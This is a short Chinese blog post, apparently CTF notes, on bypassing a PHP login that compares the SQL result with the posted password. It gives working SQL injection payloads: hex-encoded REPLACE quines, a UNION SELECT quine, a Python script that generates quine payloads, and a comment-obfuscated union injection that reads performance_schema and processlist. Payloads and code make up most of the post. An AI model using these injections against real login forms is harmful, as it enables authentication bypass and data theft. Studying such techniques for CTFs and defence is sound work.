二次校验

First Post:

Last Update:

Word Count:
226

Read Time:
1 min

Page View: loading...

二次校验,又或者是有关quine的东西

二次校验

其实就是quine

前端登录的时候:

经过sql处理后的语句等于登录前post的内容就视为登录成功:

1
2
3
if($row['password']==$_POST['password']){
    echo $flag;
}

利用replace:

1
SELECT REPLACE(0x53454C454354205245504C414345287E2C307837652C636F6E636174283078333037382C686578287E292929,0x7e,concat(0x3078,hex(0x53454C454354205245504C414345287E2C307837652C636F6E636174283078333037382C686578287E292929)))
1
UNION SELECT 1,0x61646d696e,REPLACE(0x554E494F4E2053454C45435420312C3078363136343664363936652C5245504C414345287E2C307837652C636F6E636174283078333037382C686578287E29292923,0x7e,concat(0x3078,hex(0x554E494F4E2053454C45435420312C3078363136343664363936652C5245504C414345287E2C307837652C636F6E636174283078333037382C686578287E29292923)))#

脚本:

1
2
3
4
5
6
7
8
9
def quine(data, debug=True):
    if debug: print(data)
    data = data.replace('$$',"REPLACE(REPLACE($$,CHAR(34),CHAR(39)),CHAR(36),$$)")
    blob = data.replace('$$','"$"').replace("'",'"')
    data = data.replace('$$',"'"+blob+"'")
    if debug: print(data)
    return data
data=quine("' UNION SELECT $$ AS a-- ",False)
print(data)

processlist:

查询当前执行sql语句:

1
2
3
4
5
6
7
8
select info from information_schema.processlist;

+-------------------------------------------------+
| info                                            |
+-------------------------------------------------+
| NULL                                            |
| select info from information_schema.processlist |
+-------------------------------------------------+

利用:

1
2
3
1'union/**/select/**/mid(`11`,65,217)/**/from(select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,1
4,15,16,17/**/union/**/select/**/*/**/from/**/performance_schema.threads/**/where/**/na
me/**/like'%connection%'/**/limit/**/1,1)t#